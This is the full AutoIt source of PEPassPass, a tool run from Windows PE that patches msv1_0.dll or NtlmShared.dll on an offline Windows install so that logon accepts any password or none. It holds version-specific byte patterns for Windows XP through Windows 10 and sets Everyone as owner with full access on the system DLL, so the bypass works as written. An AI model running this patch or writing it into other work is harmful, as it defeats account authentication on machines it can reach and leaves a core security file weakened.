#pragma compile(Out, PEPassPass.exe)
#pragma compile(Icon, PEPassPass.ico) 
#pragma compile(ExecLevel, highestavailable)
#pragma compile(UPX, True)
#pragma compile(FileDescription, PEPassPass - Bypass the Windows logon password validation)
#pragma compile(ProductName, PEPassPass)
#pragma compile(ProductVersion, 1.2.3)
#pragma compile(FileVersion, 1.2.3.0, 1.2.3.0)
#pragma compile(LegalCopyright, boulcat & ner0)

; ===============================================================================================================================
;
; PEPassPass is an AutoIt executable to disable/re-enable Windows logon password validation.
;   It is intended to be run from either Windows PE or from a second NT installation, if any, to patch the first one.
;   A possible use case is systems equipped with UEFI where Grub4DOS may fail to boot.
;   For such systems, one needs to boot either Grub4DOS, hence PassPass in Legacy/BIOS compatible mode, or Windows PE/second NT installation to boot PEPassPass from.
;   In short, an addition to the original PassPass, really much faster if Grub4Dos is available. 1.boot to grub4dos, 2.patch the file, 3.continue booting your patched Windows OS.
;   PEPassPass is able to patch Windows XP/Vista/7/8/8.1/10 for both 32-bit and 64-bit versions.
;
; PEPassPass is developed from Holmes.Sherlock's PassPass (Bypass the Password) http://reboot.pro/topic/18588-passpass-bypass-the-password.
;   PassPass is a nifty Grub4DOS (BIOS) batch script to disable/re-enable Windows logon password validation.
;
; Technical Details: The script tries to locate all existing Windows installations and corresponding Windows editions as well.
;   Thereafter, after changing permissions, it replaces the CMP instruction responsible for password verification with a 'benign' sequence of bytes.
;   For reverting back the changes, the process is just the opposite.
;   The whole idea is derived from WindowsGate http://www.911cd.net/forums//index.php?showtopic=21204
;      and Astr0baby's tutorial http://astr0baby.wordpress.com/2012/09/18/fun-with-msv1_0-dll-in-windows-7-sp1-64bit/
;
; Usage: PEPassPass.exe : displays the GUI, Select the Operating System drive and use buttons, Backup, Restore, Patch or UnPatch.
;        PEPassPass.exe /Source : Extract the embedded source in same folder.
;
; Test:
;   1. Download latest version and include in your WinPE, BIOS and/or UEFI.
;   2. Backup /<Windows directory>/system32/msv1_0.dll or NtlmShared.dll of a target installation protected by password at logon. Backup file: /<Windows directory>/system32/msv1_0.dll.bak or NtlmShared.dll.bak
;   3. Patch it. The Backup file: /<Windows directory>/system32/msv1_0.dll.bak or NtlmShared.dll.bak is created if not exist (Backup not done before).
;   4. Test whether the patch is working by being able to log on with arbitrary password or without password.
;   5. Unpatch it.
;   6. Test whether unpatch is working by not being able to log in except with the correct password.
;
; AutoIt Version: 3.3.14.2
; Author:         boulcat
; Credit:         Holmes.Sherlock for Original PassPass (Bypass the Password), a nifty Grub4DOS batch script to disable/re-enable Windows logon password validation.
;    Credit for PassPass:      Wonko the sane - For ideas, code snippets, information. The script embeds his DLL version detection script.
;                              Ectomorph a.k.a. Damian Bakowski - For his 'unannounced' patch for 32-bit version of msv1_0.dll.
;                              Astr0baby - For his reversing tutorial.
;                              Steve Si  For including support for PassPass in his wonderful tool Easy2Boot.
;                              ner0  For adding support for Windows 10 / Server 2016-2019.
;
; License: This program is distributed as freeware in the hope that it will be usefull but without any warrenty expressed or implied.
;          You are free to modify this script but I would appreciate if you shared your changes with me and include the source code in the program, as it is done.
;          Take credit for your fixes, improvements but thanks to don't take credit for work you did not do.
;
; v1.2.3 - 12/08/2021 - Fixed support for Windows 10 1809 / Server 2019.
;
; v1.2.2 - 07/08/2021 - Reverse engineered MsvpPasswordValidate function to add support for latest versions of Windows 10.
;
; v1.2.1 - 06/12/2016 - Fixed an issue with the compiled version.
;
; v1.2.0 - 27/11/2016 - Added Windows 10 support, using NtlmShared.dll.
;
; v1.1.0 - 18/09/2014 - Browse all the folders from the drive and search if System32\msv1_0.dll exist to get the "Windows" folder.
;                       Use the values of the combo rather than looking again at OSVersion and OSArch.
;
; v1.0.3 - 17/09/2014 - Add Permissions on msv1_0.dll and exclude the X: drive reserved for WinPE.
;
; v1.0.2 - 16/09/2014 - Test OSArch 32 or 64 bit from winlogon.exe
;
; v1.0.0 - 16/09/2014 - Initial Release
;
; ===============================================================================================================================

#include <File.au3>
#include <GuiComboBox.au3>
#include <GUIConstantsEx.au3>
#include <WindowsConstants.au3>
#include <Permissions.au3>

Local $idCombo, $sFirstDriveSysFolder = ""
Global $OSversion, $OSbuild, $OSversionName, $OSarch, $targetDLL

Global $patt = ""
Global $rpatt = ""
Global $32patt = "83F810"
Global $32rpatt = "33C090"
Global $32patt62 = "3bc67513"
Global $32rpatt62 = "33c07513"
Global $32patt63 = "4d3bc60F85"
Global $32rpatt63 = "4d33c00F85"
Global $32patt100 = "103BC70F"
Global $32rpatt100 = "1033C00F"
Global $32patt100_17763 = "103BC60F"
Global $32rpatt100_17763 = "1033C00F"

Global $64patt= "483BC60F85"
Global $64rpatt= "33C0900F85"
Global $64patt62= "493BC60F85"
Global $64rpatt62 = "33C0900F85"
Global $64patt63 = "493BC60F85"
Global $64rpatt63 = "33C0900F85"
Global $64patt100 = "493BC60F85"
Global $64rpatt100 = "33C0900F85"
Global $64patt100_17763 = "493BC60F"
Global $64rpatt100_17763 = "9033C00F"
Global $64patt100_19041 = "0F1F440000493BC60F"
Global $64rpatt100_19041 = "90909090909033C00F"

Global $OSversionName100 = "Windows 10 or Server 2016-2019."
Global $OSversionName63 = "Windows 8.1 or Server 2012 R2."
Global $OSversionName62 = "Windows 8 or Server 2012."
Global $OSversionName61 = "Windows 7 or Server 2008 R2."
Global $OSversionName60 = "Windows Vista or Server 2008."
Global $OSversionName52 = "Windows XP 64-bit or Server 2003."
Global $OSversionName51 = "Windows XP"
Global $OSversionName50 = "Windows 2000"
Global $OSversionNameUnknow = "Unknown !!!"

; Get source with switch: /Source
If $CMDLINE[0] >= 1 And (StringUpper($CMDLINE[1]) = "/SOURCE" Or StringUpper($CMDLINE[1]) = "-SOURCE") Then
	FileInstall("PEPassPass.au3", @ScriptDir & "\" & @YEAR & @MON & @MDAY & @HOUR & @MIN & "_PEPassPass.au3")
	FileInstall("PEPassPass.ico", @ScriptDir & "\" & @YEAR & @MON & @MDAY & @HOUR & @MIN & "_PEPassPass.ico")
	FileInstall("Permissions.au3", @ScriptDir & "\" & @YEAR & @MON & @MDAY & @HOUR & @MIN & "_Permissions.au3")
	Exit(0)
EndIf

; Disable the filesystem redirection for the 32 bit program running on 64 bit OS
_Wow64FsRedirection(False)

; Create GUI
GUICreate("PEPassPass: Bypass the Windows logon Password", 550, 185)
GUISetBkColor(0xEDF3FA)
$OsLabel = GUICtrlCreateLabel("Select the Operating System Drive :     (supports XP/Vista/7/8/8.1/10 - 32/64 bit)", 5, 6, 450, 24)
$idCombo = GUICtrlCreateCombo("", 5, 28, 450, 125, BitOR($CBS_SIMPLE, $CBS_DISABLENOSCROLL, $WS_VSCROLL))
$Note1Label = GUICtrlCreateLabel("PEPassPass v1.2.3", 190, 147, 250, 24)
$Note2Label = GUICtrlCreateLabel("Created by boulcat, updated by ner0", 155, 164, 250, 24)
$BackupButton = GUICtrlCreateButton("Backup", 465, 10, 80, 25)
GUICtrlSetTip( -1, "Create a backup of the target file")
$RestoreButton = GUICtrlCreateButton("Restore", 465, 40, 80, 25)
GUICtrlSetTip( -1, "Restore the target file from a previously created backup")
$PatchButton = GUICtrlCreateButton("Patch", 465, 80, 80, 25)
GUICtrlSetTip( -1, "Patch the selected system, bypass Windows logon password validation")
$UnPatchButton = GUICtrlCreateButton("UnPatch", 465, 110, 80, 25)
GUICtrlSetTip( -1, "UnPatch the selected system, restore Windows logon password validation")
$ExitButton = GUICtrlCreateButton("Exit", 465, 150, 80, 25)
GUICtrlSetTip( -1, "Exit")

; List all Fixed and ready drives and browse for System32\msv1_0.dll inside, OSArch 32 or 64 bit
$aDrives = DriveGetDrive("FIXED")
For $i = 1 To UBound($aDrives) - 1
	If StringUpper($aDrives[$i]) <> "X:" And DriveStatus($aDrives[$i]) = 'READY' Then   ; X: reserved for WinPE
		; Browse all the folders from the drive and search if System32\msv1_0.dll exist to get the "Windows" folder
		Local $aFolderList = _FileListToArray( $aDrives[$i], "*", 2)
		;If @error = 1 Then MsgBox(48, "", "Path was invalid.")
		;If @error = 4 Then MsgBox(48, "", "No folder(s) were found.")
		If @error = 0 Then
			For $k = 1 To $aFolderList[0]
				If FileExists($aDrives[$i] & "\" & $aFolderList[$k] & "\System32\msv1_0.dll") Then
					$gWinFolder = StringUpper($aDrives[$i]) & "\" & $aFolderList[$k]
					If $sFirstDriveSysFolder = "" Then $sFirstDriveSysFolder = $gWinFolder
					_OSVerArch($gWinFolder & "\System32\winlogon.exe")
					If $OSversionName <> $OSversionNameUnknow And ($OSarch = '32 bit' Or $OSarch = '64 bit') Then
						$sData = $gWinFolder & " * " & $OSversionName & " * " & $OSarch & " * (" & DriveGetLabel($aDrives[$i]) & ")"  ; we could add DriveGetFileSystem($aDrives[$i])
						GUICtrlSetData($idCombo, $sData)
					EndIf
				EndIf
			Next
		EndIf
	EndIf
Next
_GUICtrlComboBox_SelectString($idCombo, $sFirstDriveSysFolder)
; Show the GUI
GUISetState(@SW_SHOW)

; Switch from GUIs
While 1
	Switch GUIGetMsg()
		Case $GUI_EVENT_CLOSE, $ExitButton
			_Wow64FsRedirection(True)
			Exit(0)
		Case $BackupButton
			$ComboArray = StringSplit(GUICtrlRead($idCombo), "*", 2)
			;$sDrive = StringLeft(GUICtrlRead($idCombo), 2)
			$sWinFolder = StringStripWS($ComboArray[0], 3)
			_OSVerArch($sWinFolder & "\System32\winlogon.exe")
			_Backup($sWinFolder & "\System32\" & $targetDLL)
		Case $RestoreButton
			$ComboArray = StringSplit(GUICtrlRead($idCombo), "*", 2)
			;$sDrive = StringLeft(GUICtrlRead($idCombo), 2)
			$sWinFolder = StringStripWS($ComboArray[0], 3)
			_OSVerArch($sWinFolder & "\System32\winlogon.exe")
			_Restore($sWinFolder & "\System32\" & $targetDLL)
		Case $PatchButton
			$ComboArray = StringSplit(GUICtrlRead($idCombo), "*", 2)
			;$sDrive = StringLeft(GUICtrlRead($idCombo), 2)
			$sWinFolder = StringStripWS($ComboArray[0], 3)
			$sVerName = StringStripWS($ComboArray[1], 3)
			$sArch = StringStripWS($ComboArray[2], 3)
			_OSVerArch($sWinFolder & "\System32\winlogon.exe")
			_Patch($sWinFolder & "\System32\" & $targetDLL, $sVerName, $sArch)
		Case $UnPatchButton
			$ComboArray = StringSplit(GUICtrlRead($idCombo), "*", 2)
			;$sDrive = StringLeft(GUICtrlRead($idCombo), 2)
			$sWinFolder = StringStripWS($ComboArray[0], 3)
			$sVerName = StringStripWS($ComboArray[1], 3)
			$sArch = StringStripWS($ComboArray[2], 3)
			_OSVerArch($sWinFolder & "\System32\winlogon.exe")
			_UnPatch($sWinFolder & "\System32\" & $targetDLL, $sVerName, $sArch)
	EndSwitch
WEnd

; ===============================================================================================================================
; _Backup : Backup [Drive]\Windows\System32\[targetDLL]  To  [targetDLL].bak
; ===============================================================================================================================
Func _Backup($sBackupFile)
	If FileExists($sBackupFile & ".bak") Then
  $Ret = MsgBox(1, "Backup", 'Backup file "' & $sBackupFile & '.bak" already exist.' & @CRLF & "Do you want to replace it ?")
		If $Ret = 1 Then
			_SetOwnerAndAllAccess($sBackupFile)
			FileCopy($sBackupFile, $sBackupFile & ".bak", 1)
      If FileExists($sBackupFile & ".bak") Then MsgBox(64, "Backup", 'Backup "' & $sBackupFile & '" to "' & $sBackupFile & '.bak"' & @CRLF & "Completed successfully :)")
		EndIf
	Else
		_SetOwnerAndAllAccess($sBackupFile)
		FileCopy($sBackupFile, $sBackupFile & ".bak", 0)
    If FileExists($sBackupFile & ".bak") Then MsgBox(64, "Backup", 'Backup "' & $sBackupFile & '" to "' & $sBackupFile & '.bak"' & @CRLF & "Completed successfully :)")
	EndIf
EndFunc   ; ==> _Backup

; ===============================================================================================================================
; _Restore : Restore [Drive]\Windows\System32\[targetDLL].bak  To  [targetDLL]
; ===============================================================================================================================
Func _Restore($sRestoreFile)
	If FileExists($sRestoreFile & ".bak") Then
		_SetOwnerAndAllAccess($sRestoreFile)
		FileCopy($sRestoreFile & ".bak", $sRestoreFile, 1)
    If FileExists($sRestoreFile) Then MsgBox(64, "Restore", 'Restore "' & $sRestoreFile & '.bak" to "' & $sRestoreFile & '"' & @CRLF & "Completed successfully :)")
	Else
    MsgBox(48, "Restore", "Backup file " & $sRestoreFile & " does not exist !" & @CRLF & "The restoration is not possible.")
	EndIf
EndFunc   ; ==> _Restore

; ===============================================================================================================================
; _Patch : Patch [targetDLL], bypass the Windows logon Password
; ===============================================================================================================================
Func _Patch($PatchFile, $PatchVerName, $PatchArch)
	_SetOwnerAndAllAccess($PatchFile)
	If Not FileExists($PatchFile & ".bak") Then FileCopy($PatchFile, $PatchFile & ".bak", 0)
	_FormatString($PatchVerName, $PatchArch)

	; Initial read file
	$openfile = FileOpen($PatchFile, 16)
	$readfile = FileRead($openfile)
	FileClose($openfile)

	; Patch file
	$readfile2 = StringReplace($readfile, $patt, $rpatt)
	Local $iReplacements = @extended
	If $iReplacements = 0 Then
		MsgBox(48, "Patch", 'File ' & $PatchFile & ' seems already Patched !')
	Else
		$openoutputfile = FileOpen($PatchFile, 16 + 2)
		If @error Then
			MsgBox(48, "Patch", 'Error Opening file: ' & $PatchFile)
			Return
		EndIf
		FileWrite($openoutputfile, $readfile2)
		If @error Then
			MsgBox(48, "Patch", 'Error Patching (writing): ' & $PatchFile)
			Return
		EndIf
		FileClose($openoutputfile)

		; Check if file is well patched
		$openfile = FileOpen($PatchFile, 16)
		$readfile3 = FileRead($openfile)
		FileClose($openfile)
		If $readfile = $readfile3 Then
			MsgBox(48, "Patch", 'File ' & $PatchFile & ' was not Patched !' & @CRLF & 'File open in EFS (Encrypting File System) ?' & @CRLF & 'Use PEPassPass in WinPE')
		Else
			MsgBox(64, "Patch", 'File ' & $PatchFile & ' successfully Patched :)')
		EndIf
	EndIf
EndFunc   ; ==> _Patch

; ===============================================================================================================================
; _UnPatch : UnPatch [targetDLL], restore the Windows logon Password
; ===============================================================================================================================
Func _UnPatch($PatchFile, $PatchVerName, $PatchArch)
	_SetOwnerAndAllAccess($PatchFile)
	_FormatString($PatchVerName, $PatchArch)

	; Initial read file
	$openfile = FileOpen($PatchFile, 16)
	$readfile = FileRead($openfile)
	FileClose($openfile)

	; UnPatch file
	$readfile2 = StringReplace($readfile, $rpatt, $patt)
	Local $iReplacements = @extended
	If $iReplacements = 0 Then
    MsgBox(48, "UnPatch", "File " & $PatchFile & " does not seem Patched !" & @CRLF & "File open in EFS (Encrypting File System) ?" & @CRLF & "Use PEPassPass in WinPE")
	Else
		$openoutputfile = FileOpen($PatchFile, 16 + 2)
		If @error Then
			MsgBox(48, "UnPatch", 'Error Opening file: ' & $PatchFile)
			Return
		EndIf
		FileWrite($openoutputfile, $readfile2)
		If @error Then
			MsgBox(48, "UnPatch", 'Error UnPatching (writing): ' & $PatchFile)
			Return
		EndIf
		FileClose($openoutputfile)

		; Check if file is well patched
		$openfile = FileOpen($PatchFile, 16)
		$readfile3 = FileRead($openfile)
		FileClose($openfile)
		If $readfile = $readfile3 Then
			MsgBox(48, "UnPatch", 'File ' & $PatchFile & ' was not UnPatched !' & @CRLF & 'File open in EFS (Encrypting File System) ?' & @CRLF & 'Use PEPassPass in WinPE')
		Else
			MsgBox(64, "UnPatch", 'File ' & $PatchFile & ' successfully UnPatched :)')
		EndIf
	EndIf
EndFunc   ; ==> _UnPatch

; ===============================================================================================================================
; _FormatString : Format search and replace string following OS version and OS Architecture
; ===============================================================================================================================
Func _FormatString($FmtVerName, $FmtArch)
	If $FmtArch = '32 bit' Then
		If $FmtVerName = $OSversionName100 And $OSbuild >= 17763 Then
			$patt = $32patt100_17763
			$rpatt = $32rpatt100_17763
		ElseIf $FmtVerName = $OSversionName100 Then
			$patt = $32patt100
			$rpatt = $32rpatt100
		ElseIf $FmtVerName = $OSversionName63 Then
			$patt = $32patt63
			$rpatt = $32rpatt63
		ElseIf $FmtVerName = $OSversionName62 Then
			$patt = $32patt62
			$rpatt = $32rpatt62
		Else
			$patt = $32patt
			$rpatt = $32rpatt
		EndIf
	Else   ; 64 bit
		If $FmtVerName = $OSversionName100 And $OSbuild >= 19041 Then
			$patt = $64patt100_19041
			$rpatt = $64rpatt100_19041
		ElseIf $FmtVerName = $OSversionName100 And $OSbuild >= 17763 Then
			$patt = $64patt100_17763
			$rpatt = $64rpatt100_17763
		ElseIf $FmtVerName = $OSversionName100 Then
			$patt = $64patt100
			$rpatt = $64rpatt100
		ElseIf $FmtVerName = $OSversionName63 Then
			$patt = $64patt63
			$rpatt = $64rpatt63
		ElseIf $FmtVerName = $OSversionName62 Then
			$patt = $64patt62
			$rpatt = $64rpatt62
		Else
			$patt = $64patt
			$rpatt = $64rpatt
		EndIf
	EndIf
EndFunc   ; ==> _FormatString

; ===============================================================================================================================
; _OSVerArch : Get OS version, OS version name and OS Architecture
; ===============================================================================================================================
Func _OSVerArch($sFileVerArch)
	$OSversion = StringLeft(FileGetVersion($sFileVerArch), 3)
	If $OSversion = "10." Then
		$targetDLL = "NtlmShared.dll"
		$OSversionName = $OSversionName100
		$OSbuild = StringRight(StringLeft(FileGetVersion($sFileVerArch), 10), 5)
	ElseIf $OSversion = "6.3" Then
		$targetDLL = "msv1_0.dll"
		$OSversionName = $OSversionName63
	ElseIf $OSversion = "6.2" Then
		$targetDLL = "msv1_0.dll"
		$OSversionName = $OSversionName62
	ElseIf $OSversion = "6.1" Then
		$targetDLL = "msv1_0.dll"
		$OSversionName = $OSversionName61
	ElseIf $OSversion = "6.0" Then
		$targetDLL = "msv1_0.dll"
		$OSversionName = $OSversionName60
	ElseIf $OSversion = "5.2" Then
		$targetDLL = "msv1_0.dll"
		$OSversionName = $OSversionName52
	ElseIf $OSversion = "5.1" Then
		$targetDLL = "msv1_0.dll"
		$OSversionName = $OSversionName51
	ElseIf $OSversion = "5.0" Then
		$targetDLL = "msv1_0.dll"
		$OSversionName = $OSversionName50
	Else
		$targetDLL = "msv1_0.dll"
		$OSversionName = $OSversionNameUnknow
	EndIf

	; See _WinAPI_GetBinaryType($sFileVerArch)
	Local $stType = DllStructCreate("dword;")
	$aRet = DllCall("kernel32.dll", "hwnd", "GetBinaryType", "str", $sFileVerArch, "ptr", DllStructGetPtr($stType))
	If $aRet[0] = 0 Then Return "Not an executable file"

		; Local Const $SCS_32BIT_BINARY = 0 ; A 32-bit Windows-based application
		; Local Const $SCS_DOS_BINARY = 1 ; An MS-DOS  based application
		; Local Const $SCS_WOW_BINARY = 2 ; A 16-bit Windows-based application
		; Local Const $SCS_PIF_BINARY = 3 ; A PIF file that executes an MS-DOS  based application
		; Local Const $SCS_POSIX_BINARY = 4 ; A POSIX  based application
		; Local Const $SCS_OS216_BINARY = 5 ; A 16-bit OS/2-based application
		; Local Const $SCS_64BIT_BINARY = 6 ; A 64-bit Windows-based application

	Switch DllStructGetData($stType, 1)
		Case "0"
			$OSarch = '32 bit'
		Case "1"
			$OSarch = 'MS-DOS'
		Case "2"
			$OSarch = '16 bit'
		Case "3"
			$OSarch = 'PIF file'
		Case "4"
			$OSarch = 'POSIX'
		Case "5"
			$OSarch = '16 bit OS/2'
		Case "6"
			$OSarch = '64 bit'
		Case Else
			$OSarch = 'Unknown !!!'
	EndSwitch
EndFunc   ; ==> _OSVerArch

; ===============================================================================================================================
; _SetOwnerAndAllAccess : Set Permissions, Grant everyone access and Set everyone Owner
; ===============================================================================================================================
Func _SetOwnerAndAllAccess($sAccessFile)
	If FileExists($sAccessFile) Then
		$ret = _GrantAllAccess($sAccessFile)
		If Not $ret = 1 Then MsgBox(48, 'Permissions', 'Grant everyone access on: ' & @CRLF & $sAccessFile & @CRLF & 'Failed with return code: ' & $ret)
		$ret = _SetObjectOwner($sAccessFile, $SE_FILE_OBJECT, 'S-1-1-0')
		If Not $ret = 1 Then MsgBox(48, 'Permissions', 'Set everyone Owner on: ' & @CRLF & $sAccessFile & @CRLF & 'Failed with return code: ' & $ret)
	EndIf
EndFunc   ; ==> _SetOwnerAndAllAccess

; ===============================================================================================================================
; _Wow64FsRedirection : Disables or reverts the filesystem redirection for a 32 bit process running on 64 bit OS
; ===============================================================================================================================
Func _Wow64FsRedirection($state)
    If Not @AutoItX64 And @OSArch = 'X64' Then
        If $state Then
            DllCall("kernel32.dll", "int", "Wow64RevertWow64FsRedirection", "int", 0)
        Else
            DllCall("kernel32.dll", "int", "Wow64DisableWow64FsRedirection", "int", 0); or 1 as per help
        EndIf
        If @error Then Return SetError(1)
    EndIf
EndFunc   ;==>_Wow64FsRedirection
